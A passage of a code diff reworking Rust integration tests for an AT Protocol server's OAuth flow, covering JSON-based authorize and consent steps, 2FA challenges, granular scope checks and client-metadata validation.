.unwrap();
649
+
let body: Value = lockout_res.json().await.unwrap();
650
+
let desc = body["error_description"].as_str().unwrap_or("");
651
+
assert!(
652
+
desc.contains("Too many") || desc.contains("No 2FA") || body["error"] == "invalid_request",
653
+
"Expected lockout error, got: {:?}",
654
+
body
655
+
);
656
}
657
658
#[tokio::test]
···
666
let create_res = http_client
667
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
668
.json(&json!({ "handle": handle, "email": email, "password": password }))
669
+
.send()
670
+
.await
671
+
.unwrap();
672
let account: Value = create_res.json().await.unwrap();
673
let user_did = account["did"].as_str().unwrap().to_string();
674
verify_new_account(&http_client, &user_did).await;
···
678
let (code_verifier, code_challenge) = generate_pkce();
679
let par_body: Value = http_client
680
.post(format!("{}/oauth/par", url))
681
+
.form(&[
682
+
("response_type", "code"),
683
+
("client_id", &client_id),
684
+
("redirect_uri", redirect_uri),
685
+
("code_challenge", &code_challenge),
686
+
("code_challenge_method", "S256"),
687
+
])
688
+
.send()
689
+
.await
690
+
.unwrap()
691
+
.json()
692
+
.await
693
+
.unwrap();
694
let request_uri = par_body["request_uri"].as_str().unwrap();
695
+
let auth_res = http_client
696
.post(format!("{}/oauth/authorize", url))
697
+
.header("Content-Type", "application/json")
698
+
.header("Accept", "application/json")
699
+
.json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": true}))
700
.send().await.unwrap();
701
+
assert_eq!(
702
+
auth_res.status(),
703
+
StatusCode::OK,
704
+
"Expected OK with JSON response"
705
+
);
706
+
let device_cookie = auth_res
707
+
.headers()
708
+
.get("set-cookie")
709
.and_then(|v| v.to_str().ok())
710
.map(|s| s.split(';').next().unwrap_or("").to_string())
711
.expect("Should have device cookie");
712
+
let auth_body: Value = auth_res.json().await.unwrap();
713
+
let mut location = auth_body["redirect_uri"]
714
+
.as_str()
715
+
.expect("Expected redirect_uri")
716
+
.to_string();
717
+
if location.contains("/oauth/consent") {
718
+
let consent_res = http_client
719
+
.post(format!("{}/oauth/authorize/consent", url))
720
+
.header("Content-Type", "application/json")
721
+
.json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": true}))
722
+
.send().await.unwrap();
723
+
assert_eq!(
724
+
consent_res.status(),
725
+
StatusCode::OK,
726
+
"Consent should succeed"
727
+
);
728
+
let consent_body: Value = consent_res.json().await.unwrap();
729
+
location = consent_body["redirect_uri"]
730
+
.as_str()
731
+
.expect("Expected redirect_uri from consent")
732
+
.to_string();
733
+
}
734
assert!(location.contains("code="));
735
+
let code = location
736
+
.split("code=")
737
+
.nth(1)
738
+
.unwrap()
739
+
.split('&')
740
+
.next()
741
+
.unwrap();
742
let _ = http_client
743
.post(format!("{}/oauth/token", url))
744
+
.form(&[
745
+
("grant_type", "authorization_code"),
746
+
("code", code),
747
+
("redirect_uri", redirect_uri),
748
+
("code_verifier", &code_verifier),
749
+
("client_id", &client_id),
750
+
])
751
+
.send()
752
+
.await
753
+
.unwrap()
754
+
.json::<Value>()
755
+
.await
756
+
.unwrap();
757
let db_url = get_db_connection_string().await;
758
+
let pool = sqlx::postgres::PgPoolOptions::new()
759
+
.max_connections(1)
760
+
.connect(&db_url)
761
+
.await
762
+
.unwrap();
763
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
764
+
.bind(&user_did)
765
+
.execute(&pool)
766
+
.await
767
+
.unwrap();
768
let (code_verifier2, code_challenge2) = generate_pkce();
769
let par_body2: Value = http_client
770
.post(format!("{}/oauth/par", url))
771
+
.form(&[
772
+
("response_type", "code"),
773
+
("client_id", &client_id),
774
+
("redirect_uri", redirect_uri),
775
+
("code_challenge", &code_challenge2),
776
+
("code_challenge_method", "S256"),
777
+
])
778
+
.send()
779
+
.await
780
+
.unwrap()
781
+
.json()
782
+
.await
783
+
.unwrap();
784
let request_uri2 = par_body2["request_uri"].as_str().unwrap();
785
+
let select_res = http_client
786
.post(format!("{}/oauth/authorize/select", url))
787
.header("cookie", &device_cookie)
788
+
.header("Content-Type", "application/json")
789
+
.json(&json!({"request_uri": request_uri2, "did": &user_did}))
790
+
.send()
791
+
.await
792
+
.unwrap();
793
+
assert_eq!(
794
+
select_res.status(),
795
+
StatusCode::OK,
796
+
"Select should return OK with JSON"
797
+
);
798
+
let select_body: Value = select_res.json().await.unwrap();
799
+
assert!(
800
+
select_body["needs_2fa"].as_bool().unwrap_or(false),
801
+
"Should need 2FA"
802
+
);
803
+
let twofa_code: String =
804
+
sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1")
805
+
.bind(request_uri2)
806
+
.fetch_one(&pool)
807
+
.await
808
+
.unwrap();
809
+
let twofa_res = http_client
810
.post(format!("{}/oauth/authorize/2fa", url))
811
.header("cookie", &device_cookie)
812
+
.header("Content-Type", "application/json")
813
+
.json(&json!({"request_uri": request_uri2, "code": &twofa_code}))
814
+
.send()
815
+
.await
816
+
.unwrap();
817
+
assert_eq!(
818
+
twofa_res.status(),
819
+
StatusCode::OK,
820
+
"Valid 2FA should succeed"
821
+
);
822
+
let twofa_body: Value = twofa_res.json().await.unwrap();
823
+
let final_location = twofa_body["redirect_uri"].as_str().unwrap();
824
assert!(final_location.starts_with(redirect_uri) && final_location.contains("code="));
825
+
let final_code = final_location
826
+
.split("code=")
827
+
.nth(1)
828
+
.unwrap()
829
+
.split('&')
830
+
.next()
831
+
.unwrap();
832
let token_res = http_client
833
.post(format!("{}/oauth/token", url))
834
+
.form(&[
835
+
("grant_type", "authorization_code"),
836
+
("code", final_code),
837
+
("redirect_uri", redirect_uri),
838
+
("code_verifier", &code_verifier2),
839
+
("client_id", &client_id),
840
+
])
841
+
.send()
842
+
.await
843
+
.unwrap();
844
assert_eq!(token_res.status(), StatusCode::OK);
845
let final_token: Value = token_res.json().await.unwrap();
846
assert_eq!(final_token["sub"], user_did);
···
857
let create_res = http_client
858
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
859
.json(&json!({ "handle": handle, "email": email, "password": password }))
860
+
.send()
861
+
.await
862
+
.unwrap();
863
let account: Value = create_res.json().await.unwrap();
864
verify_new_account(&http_client, account["did"].as_str().unwrap()).await;
865
let redirect_uri = "https://example.com/state-special-callback";
···
869
let special_state = "state=with&special=chars&plus+more";
870
let par_body: Value = http_client
871
.post(format!("{}/oauth/par", url))
872
+
.form(&[
873
+
("response_type", "code"),
874
+
("client_id", &client_id),
875
+
("redirect_uri", redirect_uri),
876
+
("code_challenge", &code_challenge),
877
+
("code_challenge_method", "S256"),
878
+
("state", special_state),
879
+
])
880
+
.send()
881
+
.await
882
+
.unwrap()
883
+
.json()
884
+
.await
885
+
.unwrap();
886
let request_uri = par_body["request_uri"].as_str().unwrap();
887
+
let auth_res = http_client
888
.post(format!("{}/oauth/authorize", url))
889
+
.header("Content-Type", "application/json")
890
+
.header("Accept", "application/json")
891
+
.json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false}))
892
.send().await.unwrap();
893
+
assert_eq!(
894
+
auth_res.status(),
895
+
StatusCode::OK,
896
+
"Expected OK with JSON response"
897
+
);
898
+
let auth_body: Value = auth_res.json().await.unwrap();
899
+
let mut location = auth_body["redirect_uri"]
900
+
.as_str()
901
+
.expect("Expected redirect_uri")
902
+
.to_string();
903
+
if location.contains("/oauth/consent") {
904
+
let consent_res = http_client
905
+
.post(format!("{}/oauth/authorize/consent", url))
906
+
.header("Content-Type", "application/json")
907
+
.json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false}))
908
+
.send().await.unwrap();
909
+
assert_eq!(
910
+
consent_res.status(),
911
+
StatusCode::OK,
912
+
"Consent should succeed"
913
+
);
914
+
let consent_body: Value = consent_res.json().await.unwrap();
915
+
location = consent_body["redirect_uri"]
916
+
.as_str()
917
+
.expect("Expected redirect_uri from consent")
918
+
.to_string();
919
+
}
920
assert!(location.contains("state="));
921
let encoded_state = urlencoding::encode(special_state);
922
+
assert!(
923
+
location.contains(&format!("state={}", encoded_state)),
924
+
"State should be URL-encoded. Got: {}",
925
+
location
926
+
);
927
+
}
928
+
929
+
async fn get_oauth_token_with_scope(scope: &str) -> (String, String, String) {
930
+
let url = base_url().await;
931
+
let http_client = client();
932
+
let ts = Utc::now().timestamp_millis();
933
+
let handle = format!("scope-test-{}", ts);
934
+
let email = format!("scope-test-{}@example.com", ts);
935
+
let password = "scope-test-password";
936
+
let create_res = http_client
937
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
938
+
.json(&json!({ "handle": handle, "email": email, "password": password }))
939
+
.send()
940
+
.await
941
+
.unwrap();
942
+
assert_eq!(create_res.status(), StatusCode::OK);
943
+
let account: Value = create_res.json().await.unwrap();
944
+
let user_did = account["did"].as_str().unwrap().to_string();
945
+
verify_new_account(&http_client, &user_did).await;
946
+
let redirect_uri = "https://example.com/scope-callback";
947
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
948
+
let client_id = mock_client.uri();
949
+
let (code_verifier, code_challenge) = generate_pkce();
950
+
let par_res = http_client
951
+
.post(format!("{}/oauth/par", url))
952
+
.form(&[
953
+
("response_type", "code"),
954
+
("client_id", &client_id),
955
+
("redirect_uri", redirect_uri),
956
+
("code_challenge", &code_challenge),
957
+
("code_challenge_method", "S256"),
958
+
("scope", scope),
959
+
("state", "test"),
960
+
])
961
+
.send()
962
+
.await
963
+
.unwrap();
964
+
assert_eq!(
965
+
par_res.status(),
966
+
StatusCode::CREATED,
967
+
"PAR should succeed for scope: {}",
968
+
scope
969
+
);
970
+
let par_body: Value = par_res.json().await.unwrap();
971
+
let request_uri = par_body["request_uri"].as_str().unwrap();
972
+
let auth_res = http_client
973
+
.post(format!("{}/oauth/authorize", url))
974
+
.header("Content-Type", "application/json")
975
+
.header("Accept", "application/json")
976
+
.json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false}))
977
+
.send().await.unwrap();
978
+
assert_eq!(auth_res.status(), StatusCode::OK);
979
+
let auth_body: Value = auth_res.json().await.unwrap();
980
+
let mut location = auth_body["redirect_uri"]
981
+
.as_str()
982
+
.expect("Expected redirect_uri")
983
+
.to_string();
984
+
if location.contains("/oauth/consent") {
985
+
let approved_scopes: Vec<&str> = scope.split_whitespace().collect();
986
+
let consent_res = http_client
987
+
.post(format!("{}/oauth/authorize/consent", url))
988
+
.header("Content-Type", "application/json")
989
+
.json(&json!({"request_uri": request_uri, "approved_scopes": approved_scopes, "remember": false}))
990
+
.send().await.unwrap();
991
+
let consent_status = consent_res.status();
992
+
let consent_body: Value = consent_res.json().await.unwrap();
993
+
assert_eq!(
994
+
consent_status,
995
+
StatusCode::OK,
996
+
"Consent should succeed. Scope: {}, Body: {:?}",
997
+
scope,
998
+
consent_body
999
+
);
1000
+
location = consent_body["redirect_uri"]
1001
+
.as_str()
1002
+
.expect("Expected redirect_uri from consent")
1003
+
.to_string();
1004
+
}
1005
+
let code = location
1006
+
.split("code=")
1007
+
.nth(1)
1008
+
.unwrap()
1009
+
.split('&')
1010
+
.next()
1011
+
.unwrap();
1012
+
let token_res = http_client
1013
+
.post(format!("{}/oauth/token", url))
1014
+
.form(&[
1015
+
("grant_type", "authorization_code"),
1016
+
("code", code),
1017
+
("redirect_uri", redirect_uri),
1018
+
("code_verifier", &code_verifier),
1019
+
("client_id", &client_id),
1020
+
])
1021
+
.send()
1022
+
.await
1023
+
.unwrap();
1024
+
assert_eq!(token_res.status(), StatusCode::OK, "Token exchange failed");
1025
+
let token_body: Value = token_res.json().await.unwrap();
1026
+
let access_token = token_body["access_token"].as_str().unwrap().to_string();
1027
+
(access_token, user_did, handle)
1028
+
}
1029
+
1030
+
#[tokio::test]
1031
+
async fn test_granular_scope_repo_create_only() {
1032
+
let url = base_url().await;
1033
+
let http_client = client();
1034
+
let (token, did, _) =
1035
+
get_oauth_token_with_scope("repo:app.bsky.feed.post?action=create blob:*/*").await;
1036
+
let now = chrono::Utc::now().to_rfc3339();
1037
+
let create_res = http_client
1038
+
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
1039
+
.bearer_auth(&token)
1040
+
.json(&json!({
1041
+
"repo": &did,
1042
+
"collection": "app.bsky.feed.post",
1043
+
"record": { "$type": "app.bsky.feed.post", "text": "test post", "createdAt": now }
1044
+
}))
1045
+
.send()
1046
+
.await
1047
+
.unwrap();
1048
+
assert_eq!(
1049
+
create_res.status(),
1050
+
StatusCode::OK,
1051
+
"Should allow creating posts with repo:app.bsky.feed.post?action=create"
1052
+
);
1053
+
let body: Value = create_res.json().await.unwrap();
1054
+
let uri = body["uri"].as_str().expect("Should have uri");
1055
+
let rkey = uri.split('/').last().unwrap();
1056
+
let delete_res = http_client
1057
+
.post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url))
1058
+
.bearer_auth(&token)
1059
+
.json(&json!({ "repo": &did, "collection": "app.bsky.feed.post", "rkey": rkey }))
1060
+
.send()
1061
+
.await
1062
+
.unwrap();
1063
+
assert_eq!(
1064
+
delete_res.status(),
1065
+
StatusCode::FORBIDDEN,
1066
+
"Should NOT allow deleting with create-only scope"
1067
+
);
1068
+
let like_res = http_client
1069
+
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
1070
+
.bearer_auth(&token)
1071
+
.json(&json!({
1072
+
"repo": &did,
1073
+
"collection": "app.bsky.feed.like",
1074
+
"record": { "$type": "app.bsky.feed.like", "subject": { "uri": uri, "cid": body["cid"] }, "createdAt": now }
1075
+
}))
1076
+
.send().await.unwrap();
1077
+
assert_eq!(
1078
+
like_res.status(),
1079
+
StatusCode::FORBIDDEN,
1080
+
"Should NOT allow creating likes (wrong collection)"
1081
+
);
1082
+
}
1083
+
1084
+
#[tokio::test]
1085
+
async fn test_granular_scope_wildcard_collection() {
1086
+
let url = base_url().await;
1087
+
let http_client = client();
1088
+
let (token, did, _) = get_oauth_token_with_scope(
1089
+
"repo:app.bsky.*?action=create&action=update&action=delete blob:*/*",
1090
+
)
1091
+
.await;
1092
+
let now = chrono::Utc::now().to_rfc3339();
1093
+
let post_res = http_client
1094
+
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
1095
+
.bearer_auth(&token)
1096
+
.json(&json!({
1097
+
"repo": &did,
1098
+
"collection": "app.bsky.feed.post",
1099
+
"record": { "$type": "app.bsky.feed.post", "text": "wildcard test", "createdAt": now }
1100
+
}))
1101
+
.send()
1102
+
.await
1103
+
.unwrap();
1104
+
assert_eq!(
1105
+
post_res.status(),
1106
+
StatusCode::OK,
1107
+
"Should allow app.bsky.feed.post with app.bsky.* scope"
1108
+
);
1109
+
let body: Value = post_res.json().await.unwrap();
1110
+
let uri = body["uri"].as_str().unwrap();
1111
+
let rkey = uri.split('/').last().unwrap();
1112
+
let delete_res = http_client
1113
+
.post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url))
1114
+
.bearer_auth(&token)
1115
+
.json(&json!({ "repo": &did, "collection": "app.bsky.feed.post", "rkey": rkey }))
1116
+
.send()
1117
+
.await
1118
+
.unwrap();
1119
+
assert_eq!(
1120
+
delete_res.status(),
1121
+
StatusCode::OK,
1122
+
"Should allow delete with action=delete"
1123
+
);
1124
+
let other_res = http_client
1125
+
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
1126
+
.bearer_auth(&token)
1127
+
.json(&json!({
1128
+
"repo": &did,
1129
+
"collection": "com.example.record",
1130
+
"record": { "$type": "com.example.record", "data": "test", "createdAt": now }
1131
+
}))
1132
+
.send()
1133
+
.await
1134
+
.unwrap();
1135
+
assert_eq!(
1136
+
other_res.status(),
1137
+
StatusCode::FORBIDDEN,
1138
+
"Should NOT allow com.example.* with app.bsky.* scope"
1139
+
);
1140
+
}
1141
+
1142
+
#[tokio::test]
1143
+
async fn test_granular_scope_email_read() {
1144
+
let url = base_url().await;
1145
+
let http_client = client();
1146
+
let (token, did, _) = get_oauth_token_with_scope("account:email?action=read").await;
1147
+
let session_res = http_client
1148
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1149
+
.bearer_auth(&token)
1150
+
.send()
1151
+
.await
1152
+
.unwrap();
1153
+
assert_eq!(session_res.status(), StatusCode::OK);
1154
+
let body: Value = session_res.json().await.unwrap();
1155
+
assert_eq!(body["did"], did);
1156
+
assert!(
1157
+
body["email"].is_string(),
1158
+
"Email should be visible with account:email?action=read. Got: {:?}",
1159
+
body
1160
+
);
1161
+
}
1162
+
1163
+
#[tokio::test]
1164
+
async fn test_granular_scope_no_email_access() {
1165
+
let url = base_url().await;
1166
+
let http_client = client();
1167
+
let (token, did, _) = get_oauth_token_with_scope("repo:*?action=create blob:*/*").await;
1168
+
let session_res = http_client
1169
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1170
+
.bearer_auth(&token)
1171
+
.send()
1172
+
.await
1173
+
.unwrap();
1174
+
assert_eq!(session_res.status(), StatusCode::OK);
1175
+
let body: Value = session_res.json().await.unwrap();
1176
+
assert_eq!(body["did"], did);
1177
+
assert!(
1178
+
body["email"].is_null() || body.get("email").is_none(),
1179
+
"Email should be hidden without account:email scope. Got: {:?}",
1180
+
body["email"]
1181
+
);
1182
+
}
1183
+
1184
+
#[tokio::test]
1185
+
async fn test_granular_scope_rpc_specific_method() {
1186
+
let url = base_url().await;
1187
+
let http_client = client();
1188
+
let (token, _, _) = get_oauth_token_with_scope("rpc:app.bsky.feed.getTimeline?aud=*").await;
1189
+
let allowed_res = http_client
1190
+
.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", url))
1191
+
.bearer_auth(&token)
1192
+
.query(&[
1193
+
("aud", "did:web:api.bsky.app"),
1194
+
("lxm", "app.bsky.feed.getTimeline"),
1195
+
])
1196
+
.send()
1197
+
.await
1198
+
.unwrap();
1199
+
assert_eq!(
1200
+
allowed_res.status(),
1201
+
StatusCode::OK,
1202
+
"Should allow getServiceAuth for app.bsky.feed.getTimeline"
1203
+
);
1204
+
let body: Value = allowed_res.json().await.unwrap();
1205
+
assert!(body["token"].is_string(), "Should return service token");
1206
+
let blocked_res = http_client
1207
+
.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", url))
1208
+
.bearer_auth(&token)
1209
+
.query(&[
1210
+
("aud", "did:web:api.bsky.app"),
1211
+
("lxm", "app.bsky.feed.getAuthorFeed"),
1212
+
])
1213
+
.send()
1214
+
.await
1215
+
.unwrap();
1216
+
assert_eq!(
1217
+
blocked_res.status(),
1218
+
StatusCode::FORBIDDEN,
1219
+
"Should NOT allow getServiceAuth for app.bsky.feed.getAuthorFeed"
1220
+
);
1221
+
let blocked_body: Value = blocked_res.json().await.unwrap();
1222
+
assert!(
1223
+
blocked_body["error"]
1224
+
.as_str()
1225
+
.unwrap_or("")
1226
+
.contains("Scope")
1227
+
|| blocked_body["message"]
1228
+
.as_str()
1229
+
.unwrap_or("")
1230
+
.contains("scope"),
1231
+
"Should mention scope restriction: {:?}",
1232
+
blocked_body
1233
+
);
1234
+
let no_lxm_res = http_client
1235
+
.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", url))
1236
+
.bearer_auth(&token)
1237
+
.query(&[("aud", "did:web:api.bsky.app")])
1238
+
.send()
1239
+
.await
1240
+
.unwrap();
1241
+
assert_eq!(
1242
+
no_lxm_res.status(),
1243
+
StatusCode::BAD_REQUEST,
1244
+
"Should require lxm parameter for granular scopes"
1245
+
);
1246
}
+66
-27
tests/oauth_client_metadata.rs
+66
-27
tests/oauth_client_metadata.rs
···
7
async fn test_frontend_client_metadata_returns_valid_json() {
8
let client = client();
9
let res = client
10
-
.get(format!(
11
-
"{}/oauth/client-metadata.json",
12
-
base_url().await
13
-
))
14
.send()
15
.await
16
.expect("Failed to send request");
17
assert_eq!(res.status(), StatusCode::OK);
18
let body: Value = res.json().await.expect("Should return valid JSON");
19
-
assert!(body["client_id"].as_str().is_some(), "Should have client_id");
20
-
assert!(body["client_name"].as_str().is_some(), "Should have client_name");
21
-
assert!(body["redirect_uris"].as_array().is_some(), "Should have redirect_uris");
22
-
assert!(body["grant_types"].as_array().is_some(), "Should have grant_types");
23
-
assert!(body["response_types"].as_array().is_some(), "Should have response_types");
24
assert!(body["scope"].as_str().is_some(), "Should have scope");
25
-
assert!(body["token_endpoint_auth_method"].as_str().is_some(), "Should have token_endpoint_auth_method");
26
}
27
28
#[tokio::test]
29
async fn test_frontend_client_metadata_correct_values() {
30
let client = client();
31
let res = client
32
-
.get(format!(
33
-
"{}/oauth/client-metadata.json",
34
-
base_url().await
35
-
))
36
.send()
37
.await
38
.expect("Failed to send request");
39
assert_eq!(res.status(), StatusCode::OK);
40
let body: Value = res.json().await.unwrap();
41
let client_id = body["client_id"].as_str().unwrap();
42
-
assert!(client_id.ends_with("/oauth/client-metadata.json"), "client_id should end with /oauth/client-metadata.json");
43
let grant_types = body["grant_types"].as_array().unwrap();
44
let grant_strs: Vec<&str> = grant_types.iter().filter_map(|v| v.as_str()).collect();
45
-
assert!(grant_strs.contains(&"authorization_code"), "Should support authorization_code grant");
46
-
assert!(grant_strs.contains(&"refresh_token"), "Should support refresh_token grant");
47
let response_types = body["response_types"].as_array().unwrap();
48
let response_strs: Vec<&str> = response_types.iter().filter_map(|v| v.as_str()).collect();
49
-
assert!(response_strs.contains(&"code"), "Should support code response type");
50
-
assert_eq!(body["token_endpoint_auth_method"].as_str(), Some("none"), "Should be public client (none auth)");
51
-
assert_eq!(body["application_type"].as_str(), Some("web"), "Should be web application");
52
-
assert_eq!(body["dpop_bound_access_tokens"].as_bool(), Some(false), "Should not require DPoP");
53
let scope = body["scope"].as_str().unwrap();
54
assert!(scope.contains("atproto"), "Scope should include atproto");
55
}
···
58
async fn test_frontend_client_metadata_redirect_uri_matches_client_uri() {
59
let client = client();
60
let res = client
61
-
.get(format!(
62
-
"{}/oauth/client-metadata.json",
63
-
base_url().await
64
-
))
65
.send()
66
.await
67
.expect("Failed to send request");
···
69
let body: Value = res.json().await.unwrap();
70
let client_uri = body["client_uri"].as_str().unwrap();
71
let redirect_uris = body["redirect_uris"].as_array().unwrap();
72
-
assert!(!redirect_uris.is_empty(), "Should have at least one redirect URI");
73
let redirect_uri = redirect_uris[0].as_str().unwrap();
74
-
assert!(redirect_uri.starts_with(client_uri), "Redirect URI should be on same origin as client_uri");
75
}
···
7
async fn test_frontend_client_metadata_returns_valid_json() {
8
let client = client();
9
let res = client
10
+
.get(format!("{}/oauth/client-metadata.json", base_url().await))
11
.send()
12
.await
13
.expect("Failed to send request");
14
assert_eq!(res.status(), StatusCode::OK);
15
let body: Value = res.json().await.expect("Should return valid JSON");
16
+
assert!(
17
+
body["client_id"].as_str().is_some(),
18
+
"Should have client_id"
19
+
);
20
+
assert!(
21
+
body["client_name"].as_str().is_some(),
22
+
"Should have client_name"
23
+
);
24
+
assert!(
25
+
body["redirect_uris"].as_array().is_some(),
26
+
"Should have redirect_uris"
27
+
);
28
+
assert!(
29
+
body["grant_types"].as_array().is_some(),
30
+
"Should have grant_types"
31
+
);
32
+
assert!(
33
+
body["response_types"].as_array().is_some(),
34
+
"Should have response_types"
35
+
);
36
assert!(body["scope"].as_str().is_some(), "Should have scope");
37
+
assert!(
38
+
body["token_endpoint_auth_method"].as_str().is_some(),
39
+
"Should have token_endpoint_auth_method"
40
+
);
41
}
42
43
#[tokio::test]
44
async fn test_frontend_client_metadata_correct_values() {
45
let client = client();
46
let res = client
47
+
.get(format!("{}/oauth/client-metadata.json", base_url().await))
48
.send()
49
.await
50
.expect("Failed to send request");
51
assert_eq!(res.status(), StatusCode::OK);
52
let body: Value = res.json().await.unwrap();
53
let client_id = body["client_id"].as_str().unwrap();
54
+
assert!(
55
+
client_id.ends_with("/oauth/client-metadata.json"),
56
+
"client_id should end with /oauth/client-metadata.json"
57
+
);
58
let grant_types = body["grant_types"].as_array().unwrap();
59
let grant_strs: Vec<&str> = grant_types.iter().filter_map(|v| v.as_str()).collect();
60
+
assert!(
61
+
grant_strs.contains(&"authorization_code"),
62
+
"Should support authorization_code grant"
63
+
);
64
+
assert!(
65
+
grant_strs.contains(&"refresh_token"),
66
+
"Should support refresh_token grant"
67
+
);
68
let response_types = body["response_types"].as_array().unwrap();
69
let response_strs: Vec<&str> = response_types.iter().filter_map(|v| v.as_str()).collect();
70
+
assert!(
71
+
response_strs.contains(&"code"),
72
+
"Should support code response type"
73
+
);
74
+
assert_eq!(
75
+
body["token_endpoint_auth_method"].as_str(),
76
+
Some("none"),
77
+
"Should be public client (none auth)"
78
+
);
79
+
assert_eq!(
80
+
body["application_type"].as_str(),
81
+
Some("web"),
82
+
"Should be web application"
83
+
);
84
+
assert_eq!(
85
+
body["dpop_bound_access_tokens"].as_bool(),
86
+
Some(false),
87
+
"Should not require DPoP"
88
+
);
89
let scope = body["scope"].as_str().unwrap();
90
assert!(scope.contains("atproto"), "Scope should include atproto");
91
}
···
94
async fn test_frontend_client_metadata_redirect_uri_matches_client_uri() {
95
let client = client();
96
let res = client
97
+
.get(format!("{}/oauth/client-metadata.json", base_url().await))
98
.send()
99
.await
100
.expect("Failed to send request");
···
102
let body: Value = res.json().await.unwrap();
103
let client_uri = body["client_uri"].as_str().unwrap();
104
let redirect_uris = body["redirect_uris"].as_array().unwrap();
105
+
assert!(
106
+
!redirect_uris.is_empty(),
107
+
"Should have at least one redirect URI"
108
+
);
109
let redirect_uri = redirect_uris[0].as_str().unwrap();
110
+
assert!(
111
+
redirect_uri.starts_with(client_uri),
112
+
"Redirect URI should be on same origin as client_uri"
113
+
);
114
}
+79
-49
tests/oauth_lifecycle.rs
+79
-49
tests/oauth_lifecycle.rs
···
5
use chrono::Utc;
6
use common::{base_url, client};
7
use helpers::verify_new_account;
8
-
use reqwest::{StatusCode, redirect};
9
use serde_json::{Value, json};
10
use sha2::{Digest, Sha256};
11
use wiremock::matchers::{method, path};
···
19
let hash = hasher.finalize();
20
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
21
(code_verifier, code_challenge)
22
-
}
23
-
24
-
fn no_redirect_client() -> reqwest::Client {
25
-
reqwest::Client::builder()
26
-
.redirect(redirect::Policy::none())
27
-
.build()
28
-
.unwrap()
29
}
30
31
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
···
102
);
103
let par_body: Value = par_res.json().await.unwrap();
104
let request_uri = par_body["request_uri"].as_str().unwrap();
105
-
let auth_client = no_redirect_client();
106
-
let auth_res = auth_client
107
.post(format!("{}/oauth/authorize", url))
108
-
.form(&[
109
-
("request_uri", request_uri),
110
-
("username", &handle),
111
-
("password", &password),
112
-
("remember_device", "false"),
113
-
])
114
.send()
115
.await
116
.expect("Authorize failed");
117
-
let location = auth_res
118
-
.headers()
119
-
.get("location")
120
-
.unwrap()
121
-
.to_str()
122
-
.unwrap();
123
let code = location
124
.split("code=")
125
.nth(1)
···
596
.unwrap();
597
let par_body1: Value = par_res1.json().await.unwrap();
598
let request_uri1 = par_body1["request_uri"].as_str().unwrap();
599
-
let auth_client = no_redirect_client();
600
-
let auth_res1 = auth_client
601
.post(format!("{}/oauth/authorize", url))
602
-
.form(&[
603
-
("request_uri", request_uri1),
604
-
("username", &handle),
605
-
("password", password),
606
-
("remember_device", "false"),
607
-
])
608
.send()
609
.await
610
.unwrap();
611
-
let location1 = auth_res1
612
-
.headers()
613
-
.get("location")
614
-
.unwrap()
615
-
.to_str()
616
-
.unwrap();
617
let code1 = location1
618
.split("code=")
619
.nth(1)
···
650
.unwrap();
651
let par_body2: Value = par_res2.json().await.unwrap();
652
let request_uri2 = par_body2["request_uri"].as_str().unwrap();
653
-
let auth_res2 = auth_client
654
.post(format!("{}/oauth/authorize", url))
655
-
.form(&[
656
-
("request_uri", request_uri2),
657
-
("username", &handle),
658
-
("password", password),
659
-
("remember_device", "false"),
660
-
])
661
.send()
662
.await
663
.unwrap();
664
-
let location2 = auth_res2
665
-
.headers()
666
-
.get("location")
667
-
.unwrap()
668
-
.to_str()
669
-
.unwrap();
670
let code2 = location2
671
.split("code=")
672
.nth(1)
···
5
use chrono::Utc;
6
use common::{base_url, client};
7
use helpers::verify_new_account;
8
+
use reqwest::StatusCode;
9
use serde_json::{Value, json};
10
use sha2::{Digest, Sha256};
11
use wiremock::matchers::{method, path};
···
19
let hash = hasher.finalize();
20
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
21
(code_verifier, code_challenge)
22
}
23
24
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
···
95
);
96
let par_body: Value = par_res.json().await.unwrap();
97
let request_uri = par_body["request_uri"].as_str().unwrap();
98
+
let auth_res = http_client
99
.post(format!("{}/oauth/authorize", url))
100
+
.header("Content-Type", "application/json")
101
+
.header("Accept", "application/json")
102
+
.json(&json!({
103
+
"request_uri": request_uri,
104
+
"username": &handle,
105
+
"password": &password,
106
+
"remember_device": false
107
+
}))
108
.send()
109
.await
110
.expect("Authorize failed");
111
+
assert_eq!(
112
+
auth_res.status(),
113
+
StatusCode::OK,
114
+
"Authorize should return OK"
115
+
);
116
+
let auth_body: Value = auth_res.json().await.unwrap();
117
+
let mut location = auth_body["redirect_uri"]
118
+
.as_str()
119
+
.expect("Expected redirect_uri")
120
+
.to_string();
121
+
if location.contains("/oauth/consent") {
122
+
let consent_res = http_client
123
+
.post(format!("{}/oauth/authorize/consent", url))
124
+
.header("Content-Type", "application/json")
125
+
.json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false}))
126
+
.send().await.expect("Consent request failed");
127
+
assert_eq!(
128
+
consent_res.status(),
129
+
StatusCode::OK,
130
+
"Consent should succeed"
131
+
);
132
+
let consent_body: Value = consent_res.json().await.unwrap();
133
+
location = consent_body["redirect_uri"]
134
+
.as_str()
135
+
.expect("Expected redirect_uri from consent")
136
+
.to_string();
137
+
}
138
let code = location
139
.split("code=")
140
.nth(1)
···
611
